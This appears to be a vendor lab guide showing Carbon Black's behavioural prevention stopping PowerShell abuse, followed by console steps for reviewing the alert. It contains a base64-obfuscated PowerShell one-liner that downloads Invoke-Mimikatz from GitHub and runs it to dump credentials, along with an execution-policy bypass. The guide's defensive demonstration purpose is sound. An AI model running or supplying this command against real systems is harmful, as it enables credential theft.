After achieving initial access attackers attempt to move forward with their goals. One of the best ways of doing that is scraping credentials or abusing other existing binaries in the environment – like PowerShell. A trusted program like PowerShell is not blocked by traditional signature-based AV. It is commonly used across Windows environments for legitimate purpose – but attackers can leverage it for malicious intent as well.
In this attack we will leverage PowerShell to attempt to perform malicious actions. Unlike the last alert we ran, PowerShell will not have a known malware reputation. Instead, Carbon Black applies prevention by looking at the behaviors that applications exhibit as well as recognizing that PowerShell is trying to execute content that contains malware (Mimikatz). Behavioral based rules can be specified to apply prevention to even trusted tools if they are being used maliciously.
We will use PowerShell to attempt to run an attack leveraging Mimikatz. The command has been encoded for further obfuscation.
- Run PowerShell with administrative privileges
- Run command Set-ExecutionPolicy Unrestricted
- Run command below
powershell.exe -encodedCommand cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAAIgBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBQAG8AdwBlAHIAUwBoAGUAbABsAE0AYQBmAGkAYQAvAFAAbwB3AGUAcgBTAHAAbABvAGkAdAAvAG0AYQBzAHQAZQByAC8ARQB4AGYAaQBsAHQAcgBhAHQAaQBvAG4ALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACcAKQA7ACAASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoAIAAtAEQAdQBtAHAAQwByAGUAZABzACIA
Carbon Black applies prevention killing off the malicious PowerShell instance. PowerShell attempts to leverage Mimikatz to scrape credentials. We can recognize this malicious behavior and kill off the malicious instance while preventing the malicious actions. Note that PowerShell was allowed to run as expected until it began behaving maliciously.
We will now pivot to the Carbon Black Console to review information about the attack we just ran. If you are not currently on the Alerts page, navigate to Alerts using the left-hand menu.
- Navigate to the new alert (severity 8) and click the chevron to expand alert details
The reputation for PowerShell is trusted whitelist – which is expected; in most cases we expect PowerShell to run normally without prevention as it is used in many everyday IT activities. The power of Carbon Black is to define the behaviors that we want to prevent while allowing PowerShell to run when it should
If you do not see your alert appearing, refresh the console URL page and check again. The console URL, NOT the horizon URL.
- Click the first PowerShell.exe node
In this attack PowerShell attempted to run encoded commands. Carbon Black automatically decodes encoded PowerShell scripts – easing time to remediation and enhancing investigative ability.
We can now see the formatted PowerShell script. In this case PowerShell downloads and attempts to invoke Mimikatz before being prevented by Carbon Black. The malicious actor would attempt to use Mimikatz to grab credentials for further attack actions.
- Click the 'X' to close out of the CMD Line screen
- Click the second PowerShell.exe node
Note the red shield icon indicating that Carbon Black applied prevention. Additional process details including behaviors exhibited by the specific instance of PowerShell can be viewed on the right.